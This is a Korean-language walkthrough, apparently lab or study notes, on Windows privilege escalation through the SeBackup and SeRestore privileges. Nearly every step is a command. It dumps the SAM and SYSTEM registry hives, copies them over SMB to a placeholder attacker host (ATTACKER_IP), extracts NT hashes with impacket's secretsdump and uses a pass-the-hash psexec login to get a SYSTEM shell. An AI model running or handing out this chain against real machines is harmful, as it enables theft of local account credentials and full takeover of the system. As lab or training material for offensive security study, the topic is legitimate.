# SeBackup & SeRestore 권한을 활용한 권한 상승 - `SeBackup / SeRestore`: 모든 파일의 DACL 무시하고 백업/복원 가능 # 1. 관리자 권한으로 CMD 실행 - 일반 권한 CMD에선 `reg save` 명령이 실패. - 관리자 권한을 얻기 위해 다시 비밀번호 입력 요청됨. # 2. 현재 사용자 권한 확인 ```powershell whoami /priv # 출력 예시 SeBackupPrivilege Disabled SeRestorePrivilege Disabled ``` - 여기서 Disabled로 나와도 문제 없음. # 3. SAM & SYSTEM 레지스트리 하이브 저장 ```powershell reg save hklm\sam C:\Users\Backup\sam.hive reg save hklm\system C:\Users\Backup\system.hive ``` - `SAM`: 사용자 계정 정보 포함 - `SYSTEM`: 암호화 키 (bootkey 포함) - 위 두 파일이 있어야 로컬 사용자 해시를 복호화 가능 # 4. Kali에서 SMB 서버 실행 (페이로드 수신 준비) ```bash mkdir share python3.9 /opt/impacket/examples/smbserver.py -smb2support -username Backup -password <PASSWORD> public share ``` - `public`이라는 공유 이름 생성 - `share` 폴더에 파일 저장됨 # 5. Windows에서 SMB 공유로 파일 전송 ```cmd copy C:\Users\Backup\sam.hive \\ATTACKER_IP\public\ copy C:\Users\Backup\system.hive \\ATTACKER_IP\public\ ``` - 칼리 쪽 `share` 폴더에 두 파일 저장됨 # 6. Kali에서 `secretsdump.py`로 해시 추출 ```bash python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL ``` 출력 예시 ```bash Administrator:500:<LM Hash>:<NT Hash>::: ``` # 7. Pass-the-Hash로 SYSTEM 권한 획득 ```bash python3.9 /opt/impacket/examples/psexec.py -hashes aad3...:13a04c... administrator@<MACHINE_IP> ``` - `psexec.py`는 해시로 인증 시도 - 성공 시 SYSTEM 권한으로 윈도우 쉘 획득